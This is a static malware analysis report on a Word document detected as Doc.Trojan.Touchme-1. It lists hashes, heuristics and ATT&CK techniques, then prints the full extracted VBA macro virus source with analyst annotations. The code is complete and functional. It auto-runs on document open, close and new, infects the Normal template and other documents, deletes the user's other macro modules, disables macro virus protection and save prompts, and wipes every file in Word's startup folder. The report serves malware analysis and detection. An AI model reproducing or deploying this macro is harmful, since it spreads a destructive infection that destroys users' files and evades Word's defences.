Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 335de90739231459…

MALICIOUS

Office (OLE)

42.5 KB Created: 1997-07-07 09:37:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: cf326df2b0314157b92a7cc4425fb740 SHA-1: 6f3a9e07338f5a5c0b391ba938118aca0f3e6571 SHA-256: 335de90739231459ca904dcce2f816e7947d8b23dd4c4dd0a7d0fd9b27f58924
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

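The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Touchme-1'. It contains VBA macros, including a 'Document_Open' macro, which is a common technique for initial execution; the same routine is also called from 'Document_Close' and 'Document_New'. The macro copies its own code between the current document and the Normal template, deletes other VBA modules from both, and switches off Word's macro virus protection and several save prompts while it runs, indicating a malicious intent to spread or establish persistence. It also deletes every file in Word's startup folder (Kill Application.StartupPath + "\*.*") on each run, so the sample is destructive as well as self-replicating. The macro virus protection option is switched back on before the routine exits, so that setting alone does not reveal an infection.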

Heuristics 3

  • ClamAV: Doc.Trojan.Touchme-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Touchme-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3873 bytes
SHA-256: 86aa1a9b309b49872c064d36d7e0834c96aa98777e34c05e4163b88264a0d1f9
Detection
ClamAV: Doc.Trojan.Touchme-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' This code written by Reza Pc 212
' Copyright (C) 1999 ReYoKh Team Labs
' University of Gunadarma
'
' for all virii maker 'n the stupid jerk
'
' Last Up-Date 3 November 1999 [19.00:00]

' [analysis] Core routine of this macro virus; every event handler in the module calls it.
' [analysis] It copies the module source between the active document and the Normal
' [analysis] template, removes other VBA components from both, shows a date-triggered
' [analysis] Office Assistant balloon, and deletes the files in Word's startup folder.
' [analysis] Line numbers quoted below refer to the original, unannotated module.
Private Sub Infected()
    ' [analysis] Runtime errors are suppressed: a statement that fails is skipped without any prompt.
    On Error Resume Next
    ' [analysis] Infection marker; the same text is the final comment line of the module.
    ID = "'tHe FuCkIng aV if TOuCh mE"
    ' [analysis] In VBA only the last name of each Dim list gets the stated type; the rest are Variant.
    Dim ADSave, NTSave, ADInfect, NTInfect As Boolean
    Dim Listing, Active, Ultah, Name As String
    Dim AD, NT As Object
    
    ' [analysis] Code modules of the first VBA component in the active document and in the Normal template.
    Set AD = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
    Set NT = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
    ' [analysis] Self-recognition check: the marker is line 99 of the module (Attribute lines not counted).
    ' [analysis] ADInfect is assigned here but never read in this listing; only NTInfect gates anything.
    If AD.Lines(99, 1) = ID Then ADInfect = True
    If NT.Lines(99, 1) = ID Then NTInfect = True
            
    ' [analysis] Defense impairment. -1 is the value of wdNoProtection; the document password is blanked,
    ' [analysis] Word's macro virus warning is turned off, and the prompts that would reveal a write to the
    ' [analysis] Normal template or a conversion are silenced. Auto macros are disabled for the duration.
    ActiveDocument.Protect -1
    ActiveDocument.Password = ""
    Options.VirusProtection = False
    Options.SavePropertiesPrompt = False
    Options.SaveNormalPrompt = False
    Options.ConfirmConversions = False
    WordBasic.DisableAutoMacros True
    ' [analysis] Visible host indicator: the Word title bar text is replaced with this string.
    Application.Caption = "Mikrosof Werd"
    
    ' [analysis] Removes every VBA component except "EcHa" and "ThisDocument" from the document and
    ' [analysis] from the Normal template, so the user's own macro modules are lost as well.
    For Each Obj In ActiveDocument.VBProject.VBComponents
        If Obj.Name <> "EcHa" And Obj.Name <> "ThisDocument" Then
            Application.OrganizerDelete Source:=ActiveDocument.FullName, _
            Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems
        End If
    Next Obj
    For Each Obj In NormalTemplate.VBProject.VBComponents
        If Obj.Name <> "EcHa" And Obj.Name <> "ThisDocument" Then
            Application.OrganizerDelete Source:=NormalTemplate.FullName, _
            Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems
        End If
    Next Obj
    
    ' [analysis] Persistence: if the template lacks the marker, its module is wiped and replaced with the
    ' [analysis] document's module text. The template is saved only when it had no pending changes before
    ' [analysis] the overwrite (NTSave is captured first). The "EcHa" project item is copied across too.
    If NTInfect = False Then
        NTSave = NormalTemplate.Saved
        Listing = AD.Lines(1, AD.CountOfLines)
        NT.DeleteLines 1, NT.CountOfLines
        NT.AddFromString Listing
        If NTSave = True Then NormalTemplate.Save
        Application.OrganizerCopy Source:=ActiveDocument.FullName, _
        Destination:=NormalTemplate, Name:="EcHa", Object:=wdOrganizerObjectProjectItems
    End If
    
    ' [analysis] Propagation: runs unconditionally. The active document's module is overwritten with the
    ' [analysis] template's module text, and the document is saved if it had no pending changes.
    ADSave = ActiveDocument.Saved
    Listing = NT.Lines(1, NT.CountOfLines)
    AD.DeleteLines 1, AD.CountOfLines
    AD.AddFromString Listing
    If ADSave = True Then ActiveDocument.Save
    Application.OrganizerCopy Source:=NormalTemplate.FullName, _
    Destination:=ActiveDocument, Name:="EcHa", Object:=wdOrganizerObjectProjectItems
        
    ' [analysis] Date triggers. On the 1st of a month Name equals ID, which the test below excludes, so no
    ' [analysis] balloon appears; on 5 March, 8 August and 22 December a greeting balloon is shown.
    If Day(Date) = 1 Then Name = ID
    If Day(Date) = 5 And Month(Date) = 3 Then Name = "REZA"
    If Day(Date) = 8 And Month(Date) = 8 Then Name = "YOMBI"
    If Day(Date) = 22 And Month(Date) = 12 Then Name = "NELIS"
    If Name <> "" And Name <> ID Then
        ' [analysis] Balloon text appears to be Indonesian (a birthday greeting and a thank-you line).
        Ultah = "Oh ya... Selamat Ulang Tahun !!!" + Chr(13) + Name + _
                ", I hope you always Happy"
        ' [analysis] The Assistant's previous visibility is remembered and restored after the balloon.
        Active = Assistant.Visible
        Assistant.Visible = True
        With Assistant.NewBalloon
            .Text = "EcHa mengucapkan terima kasih... " + Chr(13) + _
                    "Telah menggunakan macro saya" + Chr(13) + Chr(13) + Ultah
            .Show
        End With
        Assistant.Visible = Active
    End If
    ' [analysis] Destructive step, outside the date check: deletes every file in Word's startup folder
    ' [analysis] on each invocation.
    Kill Application.StartupPath + "\*.*"
    ' [analysis] Macro virus protection and auto macros are switched back on before exit, so those two
    ' [analysis] settings look normal afterwards. The save/convert prompts and the caption are not restored.
    Options.VirusProtection = True
    WordBasic.DisableAutoMacros False
End Sub
' [analysis] Word document event handler: runs the Infected routine when the document is closed,
' [analysis] so the routine is triggered on close as well as on open.
Private Sub Document_Close()
    Infected
End Sub
' [analysis] Auto-run entry point flagged by the OLE_VBA_DOCOPEN heuristic: runs the Infected routine
' [analysis] as soon as the document is opened with macros allowed.
Private Sub Document_Open()
    Infected
End Sub
' [analysis] Calls the Infected routine. NOTE(review): "Save" does not look like an event Word raises
' [analysis] for ThisDocument, so this handler is probably never invoked automatically - confirm.
Private Sub Document_Save()
    Infected
End Sub
' [analysis] Word document event handler: runs the Infected routine when a new document is created
' [analysis] from a template carrying this module, which is how an infected Normal template spreads it.
Private Sub Document_New()
    Infected
End Sub
' [analysis] Calls the Infected routine. NOTE(review): "Exit" does not look like an event Word raises
' [analysis] for ThisDocument, so this handler is probably never invoked automatically - confirm.
Private Sub Document_Exit()
    Infected
End Sub
' [analysis] Calls the Infected routine. NOTE(review): "Exec" does not look like an event Word raises
' [analysis] for ThisDocument, so this handler is probably never invoked automatically - confirm.
Private Sub Document_Exec()
    Infected
End Sub
'tHe FuCkIng aV if TOuCh mE